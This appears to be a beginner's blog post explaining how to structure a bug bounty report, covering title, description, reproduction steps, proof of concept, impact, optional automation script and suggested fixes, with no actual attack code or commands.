Hi! Bug hunters, thanks for appreciating my previous article, I know there are many write-ups about “how to write a good bug report” but one thing I notice that’s all are intermediate and advance level and it is very difficult to understand for a beginner. In this write-up, we will focus only to write a good and potential report in order to submit in bug bounty programs.
Before we start, let’s know about the components of a report, any report contains Title, Description, Reproduce steps, Proof-of-concept, exploit code, recommended solution, and References. in order to submit bug bounty report each component has different roles. Writing all component in every report is not a good practice its all depend on the scenario and nature of vulnerability.
Writing a good report is very difficult, When I started, I spend 1–2 hours to write one report. after submitting 100+ bug reports on different platforms. I understood what is the main components of the report and how it helps the security engineers to spot the vulnerability. I’m going to describe each one by one. let’s start…
The first impression is the last impression, the security engineer looks the Title first and he can understand what is the issue? Write about what kind of functionality you can able to abuse or what kind of protection you can bypass. Write in just one line.
This component provides details of the vulnerability, you can explain the vulnerability here, write about the paths, endpoints, error messages you got while testing. You can also attach HTTP requests, vulnerable source code.
Steps to reproduce
You must write each step clearly in-order to demonstrate the issue. that helps security engineers to triage fast.
Proof of concept
This component is the visual of the whole work. You can record a demonstration video or attach screenshots.
Write about the real-life impact, How an attacker can take advantage if he successfully exploits the vulnerability. What type of possible damages could be done? (avoid writing about the theoretical impact)
If you are familiar with any scripting languages then In order to automate the whole process, you can write one script
You can suggest the company to implement any kind of functionality or prevention method to mitigate the issue.
You can find more sample reports here Bug-report
The good report plays a key role in bug bounty, sometimes the company appreciates your reports and award you some bonus, sometimes they pay a small bounty for a similar report. It depends on the quality of the report.